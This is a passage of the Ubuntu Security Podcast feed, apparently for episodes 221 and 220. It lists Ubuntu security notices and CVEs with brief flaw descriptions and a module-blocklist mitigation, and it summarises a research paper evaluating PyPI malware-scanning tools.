<li><a href="/episode-220/#usn-6648-1-linux-kernel-vulnerabilities--02-00">[USN-6648-1] Linux kernel vulnerabilities from Episode 220</a></li>
<li>OOB write in KTLS</li>
<li>UAF in AppleTalk network driver</li>
</ul>
<h3 id="usn-6651-2-usn-6651-3-linux-kernel--including-starfive--vulnerabilities--03-52">[<a href="https://ubuntu.com/security/notices/USN-6651-2">USN-6651-2</a>, <a href="https://ubuntu.com/security/notices/USN-6651-3">USN-6651-3</a>] Linux kernel (including StarFive) vulnerabilities (03:52)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0582">CVE-2024-0582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6653-2-usn-6653-3-usn-6653-4-linux-kernel--aws-low-latency-and-gke--vulnerabilities--04-07">[<a href="https://ubuntu.com/security/notices/USN-6653-2">USN-6653-2</a>, <a href="https://ubuntu.com/security/notices/USN-6653-3">USN-6653-3</a>, <a href="https://ubuntu.com/security/notices/USN-6653-4">USN-6653-4</a>] Linux kernel (AWS, Low Latency &amp; GKE) vulnerabilities (04:07)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6647-2-linux-kernel--azure--vulnerabilities--04-15">[<a href="https://ubuntu.com/security/notices/USN-6647-2">USN-6647-2</a>] Linux kernel (Azure) vulnerabilities (04:15)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-7192">CVE-2023-7192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6647-1-linux-kernel-vulnerabilities--01-14">[USN-6647-1] Linux kernel vulnerabilities from Episode 220</a></li>
<li>Memory leak in netfilter able to be abused via an unprivileged user
namespace - DoS via exhausting system memory</li>
</ul>
<h3 id="usn-6670-1-php-guzzlehttp-psr7-vulnerabilities--04-36">[<a href="https://ubuntu.com/security/notices/USN-6670-1">USN-6670-1</a>] php-guzzlehttp-psr7 vulnerabilities (04:36)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29197">CVE-2023-29197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24775">CVE-2022-24775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP message library conforming the the PSR-7 specification - failed to
properly account for embedded newlines in HTTP headers - classic HTTP
smuggling attack vuln</li>
<li>Original fix from 2022 was found to be incomplete so additional CVE assigned
for the follow-up fix</li>
</ul>
<h3 id="usn-6671-1-php-nyholm-psr7-vulnerability--05-15">[<a href="https://ubuntu.com/security/notices/USN-6671-1">USN-6671-1</a>] php-nyholm-psr7 vulnerability (05:15)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29197">CVE-2023-29197</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Alternative PSR-7 implementation which also suffered from the same issue</li>
</ul>
<h3 id="usn-6669-1-thunderbird-vulnerabilities--05-35">[<a href="https://ubuntu.com/security/notices/USN-6669-1">USN-6669-1</a>] Thunderbird vulnerabilities (05:35)</h3>
<ul>
<li>17 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1552">CVE-2024-1552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1551">CVE-2024-1551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1546">CVE-2024-1546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0746">CVE-2024-0746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1553">CVE-2024-1553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1550">CVE-2024-1550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1549">CVE-2024-1549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1548">CVE-2024-1548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1547">CVE-2024-1547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0755">CVE-2024-0755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0753">CVE-2024-0753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0751">CVE-2024-0751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0750">CVE-2024-0750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0749">CVE-2024-0749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0747">CVE-2024-0747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0742">CVE-2024-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0741">CVE-2024-0741</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>115.8.1</li>
</ul>
<h3 id="usn-6672-1-node-dot-js-vulnerabilities--06-03">[<a href="https://ubuntu.com/security/notices/USN-6672-1">USN-6672-1</a>] Node.js vulnerabilities (06:03)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2650">CVE-2023-2650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23920">CVE-2023-23920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23919">CVE-2023-23919</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Leverages OpenSSL for cryptographic related work - failed to clear the OpenSSL
error stack in when calling various routines - as such, may get false-positive
errors on subsequent calls to OpenSSL from the same thread and hence DoS - so
a remote attacker could provide an invalid cert which would then set this
error and subsequent routines to validate certs would also appear to fail even
if they were valid</li>
<li>Uses ICU for unicode handling - allows a user to specify their own ICU data
via an environment variable - but node.js can run in different privilege
contexts so a user could then force it to load data under their control when
running with elevated privileges</li>
<li>ASN.1 encoding issue inherited from OpenSSL</li>
</ul>
<h3 id="usn-6673-1-python-cryptography-vulnerabilities--07-30">[<a href="https://ubuntu.com/security/notices/USN-6673-1">USN-6673-1</a>] python-cryptography vulnerabilities (07:30)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26130">CVE-2024-26130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50782">CVE-2023-50782</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another issue of mishandling the OpenSSL API - in this case would not properly
handle errors returned from OpenSSL when processing certificates that had
incorrect padding (talked about this last week in <a href="/episode-220/#usn-6663-1-openssl-update--08-40">[USN-6663-1] OpenSSL update</a>)</li>
<li>Mishandled error case when a PKCS+12 key and certificate did not match
one-another - would trigger an exception at runtime</li>
</ul>
<h3 id="usn-6674-1-usn-6674-2-django-vulnerability--08-22">[<a href="https://ubuntu.com/security/notices/USN-6674-1">USN-6674-1</a>, <a href="https://ubuntu.com/security/notices/USN-6674-2">USN-6674-2</a>] Django vulnerability (08:22)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27351">CVE-2024-27351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS in Truncator template filter - if supplied an input string of all
opening angle brackets <code>&lt;&lt;&lt;&lt;&lt;&lt;....</code> then would cause exponential performance
degredation</li>
</ul>
<h3 id="usn-6675-1-imageprocessing-vulnerability--08-52">[<a href="https://ubuntu.com/security/notices/USN-6675-1">USN-6675-1</a>] ImageProcessing vulnerability (08:52)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24720">CVE-2022-24720</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Image processing library for ruby based on ImageMagick</li>
<li>If an application allowed the user to specify the set of operations to be
performed, could then be abused to get arbitrary shell command execution -
internally used <code>send()</code> rather than <code>public_send()</code> which allowed access to
private methods to directly execute system calls</li>
</ul>
<h3 id="usn-6677-1-libde265-vulnerabilities--09-23">[<a href="https://ubuntu.com/security/notices/USN-6677-1">USN-6677-1</a>] libde265 vulnerabilities (09:23)</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-49468">CVE-2023-49468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49467">CVE-2023-49467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49465">CVE-2023-49465</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47471">CVE-2023-47471</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43887">CVE-2023-43887</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27103">CVE-2023-27103</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27102">CVE-2023-27102</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Next lot of libde265 vulns after discussed previously in both
<a href="/episode-220/#usn-6659-1-libde265-vulnerabilities--07-52">[USN-6659-1] libde265 vulnerabilities from
Episode 221</a> and
<a href="/episode-219/#usn-6627-1-libde265-vulnerabilities--04-10">[USN-6627-1] libde265 vulnerabilities from
Episode 219</a> - more fuzzing related fixes for usual sorts of issues - this
time includes a couple from our own David (aka <a href="https://litios.github.io/">@litios</a>)</li>
</ul>
<h3 id="usn-6678-1-libgit2-vulnerabilities--09-50">[<a href="https://ubuntu.com/security/notices/USN-6678-1">USN-6678-1</a>] libgit2 vulnerabilities (09:50)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24577">CVE-2024-24577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24575">CVE-2024-24575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22742">CVE-2023-22742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12279">CVE-2020-12279</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12278">CVE-2020-12278</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used by various tools like cargo, gnome-builder etc</li>
<li>Fix for a possible infinite loop (CPU-based DoS) when parsing a crafted
revision named simply <code>@</code></li>
<li>Use-after free when handling crafted input to <code>git_index_add</code></li>
<li>Mishandles equivalent filenames due to NTFS Data Streams (similar to
CVE-2019-1352 - <a href="/episode-56/#usn-4220-1-git-vulnerabilities-08-16">[USN-4220-1] Git vulnerabilities from Episode 56</a>)</li>
<li>Failed to perform certificate checking when using an SSH remote via the
optional libssh2 backend - which we do in Ubuntu</li>
</ul>
<h3 id="usn-6649-2-firefox-regressions--10-47">[<a href="https://ubuntu.com/security/notices/USN-6649-2">USN-6649-2</a>] Firefox regressions (10:47)</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1556">CVE-2024-1556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1552">CVE-2024-1552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1551">CVE-2024-1551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1546">CVE-2024-1546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1557">CVE-2024-1557</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1555">CVE-2024-1555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1554">CVE-2024-1554</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1553">CVE-2024-1553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1550">CVE-2024-1550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1549">CVE-2024-1549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1548">CVE-2024-1548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1547">CVE-2024-1547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>123.0.1</li>
</ul>
<h3 id="usn-6676-1-c-ares-vulnerability--10-55">[<a href="https://ubuntu.com/security/notices/USN-6676-1">USN-6676-1</a>] c-ares vulnerability (10:55)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25629">CVE-2024-25629</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>async DNS lookup library</li>
<li>Failed to properly handle embedded NUL characters when parsing
<code>/erc/resolv.conf</code> <code>/etc/hosts</code>, <code>/etc/nsswitch.conf</code> or anything specifed via the
<code>HOSTALIASES</code> environment variable - if has an embedded NUL as the first
character in a new line, would then attempt to read memory prior to the start
of the buffer and hence an OOB read -&gt; crash</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="andrei-discusses-malware-detection-with-the-python-and-pypi-ecosystem--11-46">Andrei discusses malware detection with the Python and PyPi ecosystem (11:46)</h3>
<ul>
<li><a href="https://ieeexplore.ieee.org/document/10172836">Bad Snakes: Understanding and Improving Python Package Index Malware Scanning</a></li>
</ul>
<p>Hey, Alex!</p>
<p>We will continue our journey today beyond the scope of the previous episodes. We&rsquo;ve delved into the realms of network security, federated infrastructures, and vulnerability detection and assessment.</p>
<h4 id="today-s-paper">Today’s paper</h4>
<p>Last year, the Ubuntu Security Team participated in the Linux Security Summit in Bilbao. At that time, I managed to have a discussion with Zach, who hosted a presentation at the Supply Chain Security Con entitled “Will Large-Scale Automated Scanning Stop Malware on OSS Repositories?”. I later discovered that his talk was backed by a paper that he and his colleagues from Chainguard had published.</p>
<p>With this in mind, today we will be examining “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”, which was published last year in ACM’s International Conference on Software Engineering.</p>
<p>The aim of the paper is to highlight the current state of the Python and PyPi ecosystems from a malware detection standpoint, identify the requirements for a mature malware scanner that can be integrated into PyPi, and ascertain whether the existing open-source tools meet these objectives.</p>
<h4 id="repositories-dot-pypi">Repositories. PyPi</h4>
<p>With this in mind, let&rsquo;s start by understanding the context.</p>
<p>Applications can be distributed through repositories. This means that the applications are packaged into a generic format and published in either managed or unmanaged repositories. Users can then install the application by querying the repositories, downloading the application in a format that they can unpack through a client, and subsequently run on their hosts.</p>
<p>There are numerous repositories out there. Some target specific operating systems, as is the case with Debian repositories, the Snap Store, Google Play, or the Microsoft Store. Others are designed to store packages for a specific programming language, such as PyPi, npm, and RubyGems. Firefox Add-ons and the Chrome extension store target a specific platform, namely the browser.</p>
<p>Another relevant characteristic when discussing repositories is the level of curation. The Ubuntu Archive is considered a curated repository of software packages because there are several trustworthy contributors able to publish software within the repository. Conversely, npm is unmanaged because any member of the open-source community can publish anything in it.</p>
<p>We will discuss the Python Package Index extensively, which is the de facto unmanaged repository for the Python programming language. As of the 7th of March 2024, there were 5.4 million releases for 520 thousand projects and nearly 800 thousand users. It is governed by a non-profit organisation and run by volunteers worldwide.</p>
<h4 id="supply-chain-attacks">Supply chain attacks</h4>
<p>Software repositories foster the dependencies of software on other pieces of software, controlled by different parties. As seen in campaigns such as the SolarWinds SUNBURST attack, this can go awry. Attackers can gain control over software in a company&rsquo;s supply chain, gain initial access to their infrastructure, and exploit this advantage.</p>
<p>Multiple attack vectors are possible. Accounts can be hijacked. Attackers may publish packages with similar names (in a tactic known as typosquatting). They can also leverage shrink-wrapped clones, which are duplicates of existing packages, where malicious code is injected after gaining users&rsquo; trust. While covering all attack vectors is beyond the scope of this podcast episode, you can find a comprehensive taxonomy in a paper called “Taxonomy of Attacks on Open-Source Software Supply Chains”, which lists over 100 unique attack vectors.</p>
<p>From 2017 to 2022, the number of unique projects removed from PyPi increased rapidly: 38 in the first year, followed by 130, 60, 500, 27 thousands, and finally 12 thousands in the last year. Despite the fact that most of these were reported as malware, it&rsquo;s worth noting that the impact of some of them is limited due to the lack of organic usage.</p>
<h4 id="malware-analysis">Malware analysis</h4>
<p>These attacks can be mitigated by implementing techniques such as multi-factor authentication, software signing, update frameworks, or reproducible builds, but the most widespread method is malware analysis.</p>
<p>Some engines check for anomalies via static and dynamic heuristics, while others rely on signatures due to their simplicity. Once a piece of software is detected as malicious, its hash is added to a deny list that is embedded in the anti-malware engine. Each file is then hashed and the result is checked against the deny list. If the heuristics or the hash comparison identifies the file as malicious, it is either reported, blocked, or deleted depending on the strategy implemented by the anti-malware engine.</p>
<h4 id="malware-analysis-in-pypi">Malware analysis in PyPi</h4>
<p>These solutions are already implemented in software repositories. In the case of PyPi, malware scanning was introduced in February 2022 with the assistance of a malware check feature in Warehouse, the application serving PyPi. However, it was disabled by the administrators two years later and ultimately removed in May 2023 due to an overload of alerts.</p>
<p>In addition to this technical solution, PyPi also capitalises on a form of social symbiosis. Software security companies and individuals conduct security research, reporting any discovered malware to the PyPi administrators via email. The administrators typically allocate 20 minutes per week to review these malware reports and remove any packages that can be verified as true positives. Ultimately, the reporting companies and individuals gain reputation or attention for their brands, products, and services.</p>
<h4 id="requirements">Requirements</h4>
<p>In addition to information about software repositories, supply chain attacks, malware analysis, and PyPi, the researchers also interviewed administrators from PyPi to understand their requirements for a malware analysis tool that could assist them. The three interviews, each lasting one hour, were conducted in July and August 2022 and involved only three individuals. This limited number of interviews is due to the focus on the PyPi ecosystem, where only ten people are directly involved in malware scanning activities.</p>
<p>When discussing requirements, the administrators desired tools with a binary outcome, which could be determined by checking if a numerical score exceeds a threshold or not. The decision should also be supported by arguments. While administrators can tolerate false negatives, they aim to reduce the rate of false positives to zero. The tool should also operate on limited resources and be easy to adopt, use and maintain.</p>
<h4 id="current-tooling">Current tooling</h4>
<p>But do the current solutions tick these boxes?</p>
<p>The researchers selected tools based on a set of criteria: analysing the code of the packages, having public detection techniques, and detection rules. Upon examining the available solutions, they found that only three could be used for evaluation in the context of their research: PyPi&rsquo;s malware checks, Bandit4Mal, and OSSGadget&rsquo;s OSS Detect Backdoor.</p>
<p>Regarding the former, it should be noted that the researchers did not match the YARA rules only against the setup files, but also against all files in the Python package. The second, Bandit4Mal, is an open-source version of Bandit that has been adapted to include multiple rules for detecting malicious patterns in the AST generated from a program&rsquo;s codebase. The last, OSSGadget&rsquo;s OSS Detect Backdoor, is a tool developed by Microsoft in June 2020 to perform rule-based malware detection on each file in a package.</p>
<p>These tools were tested against both malicious and benign Python packages. The researchers used two datasets containing 168 manually-selected malicious packages. For the benign packages, they selected 1,400 popular packages and one thousand randomly-selected benign Python packages.</p>
<p>For the evaluation process, they considered an alert in a malicious package to be a true positive and an alert in a benign package to be a false positive.</p>
<p>The true positive rate was 85% for the PyPi checks, the same for OSS Detect Backdoor and 90% for Bandit4Mal. The false positive rates ranged from 15% for the PyPi checks over the random packages, to 80% for Bandit4Mal on popular packages.</p>
<p>The tools ran in a time-effective manner, with a median time of around two seconds per package across all datasets. The maximum runtime was recorded for Ansible’s package, which was scanned in 26 minutes.</p>
<p>Despite their efficient run times, we can infer from these results that the tools are not accurate enough to meet the demands of PyPi’s administrators. The analysts may be overwhelmed by alerts for benign packages, which could interfere with their other operations.</p>
<h4 id="conclusions">Conclusions</h4>
<p>And with this, we can conclude the episode of the Ubuntu Security Podcast, which details the paper “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”. We have discussed software repositories, malware analysis, and malware-related operations within PyPi. We&rsquo;ve also explored the requirements that would make a new open-source Python malware scanner suitable for the PyPi administrators and evaluated how the current solutions perform.</p>
<p>If you come across any interesting topics that you believe should be discussed, please email us at <a href="mailto:security@ubuntu.com">security@ubuntu.com</a>.</p>
<p>Over to you, Alex!</p>
<h4 id="resources">Resources</h4>
<ul>
<li><a href="https://ieeexplore.ieee.org/document/10172836">Bad Snakes: Understanding and Improving Python Package Index Malware Scanning</a></li>
<li><a href="https://arxiv.org/abs/2204.04008">Taxonomy of Attacks on Open-Source Software Supply Chains</a></li>
<li><a href="https://github.com/lyvd/bandit4mal">Bandit4Mal</a></li>
<li><a href="https://github.com/microsoft/OSSGadget/tree/main/src/oss-detect-backdoor">OSS Detect Backdoor</a></li>
<li><a href="https://github.com/pypi/warehouse/commit/319cbc0cc2bb6d721d04d49dbf3c82445eca4000">PyPi’s malware checks</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E221.mp3" length="24247149" type="audio/mpeg" /><itunes:duration>1394</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 220
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-220/</link>
          <pubDate>Fri, 01 Mar 2024 17:01:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>04536b47d2a272ae81484ef44ce18274b7d9afbdba33db1ebfa94db65bab06ee92f41f2d946e2618dbcf6c4fe282960420eb1a906e45a97f5effdc3576d48268</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 220</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic
  to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover
  security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic
  to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover
  security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel
  itself.
  </itunes:summary>
        <description>  The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic
  to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover
  security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel
  itself.
  </description>
        <googleplay:description>  The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic
  to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover
  security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel
  itself.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic
to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover
security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel
itself.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>64 unique CVEs addressed</p>
<h3 id="usn-6647-1-linux-kernel-vulnerabilities--01-14">[<a href="https://ubuntu.com/security/notices/USN-6647-1">USN-6647-1</a>] Linux kernel vulnerabilities (01:14)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-7192">CVE-2023-7192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - AWS/Azure/GCP/HWE/KVM/Oracle</li>
<li>Memory leak in netfilter able to be abused via an unprivileged user
namespace - DoS via exhausting system memory</li>
</ul>
<h3 id="usn-6648-1-linux-kernel-vulnerabilities--02-00">[<a href="https://ubuntu.com/security/notices/USN-6648-1">USN-6648-1</a>] Linux kernel vulnerabilities (02:00)</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - IOT/Xilinx ZynqMP/IBM/Bluefield/GKEOP/Raspi/KVM/Oracle/AWS/GCP/Generic/LowLatency/OEM</li>
<li>OOB write in KTLS reported by Jann Horn - if a user can get the kernel to
splice a ktls socket can possibly escalate privileges</li>
<li>UAF in AppleTalk network driver - could be abused by a local unprivileged
user - can be mitigated by blocklisting in <code>/etc/modprobe.d/blacklist-rare-network.conf</code>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cfg" data-lang="cfg"><span style="display:flex;"><span><span style="color:#75715e"># appletalk</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">alias net-pf-5 off</span>
</span></span></code></pre></div></li>
</ul>
<h3 id="usn-6650-1-linux-kernel--oem--vulnerability--03-30">[<a href="https://ubuntu.com/security/notices/USN-6650-1">USN-6650-1</a>] Linux kernel (OEM) vulnerability (03:30)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref in generic ID allocator</li>
</ul>
<h3 id="usn-6651-1-linux-kernel-vulnerabilities--03-38">[<a href="https://ubuntu.com/security/notices/USN-6651-1">USN-6651-1</a>] Linux kernel vulnerabilities (03:38)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0582">CVE-2024-0582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
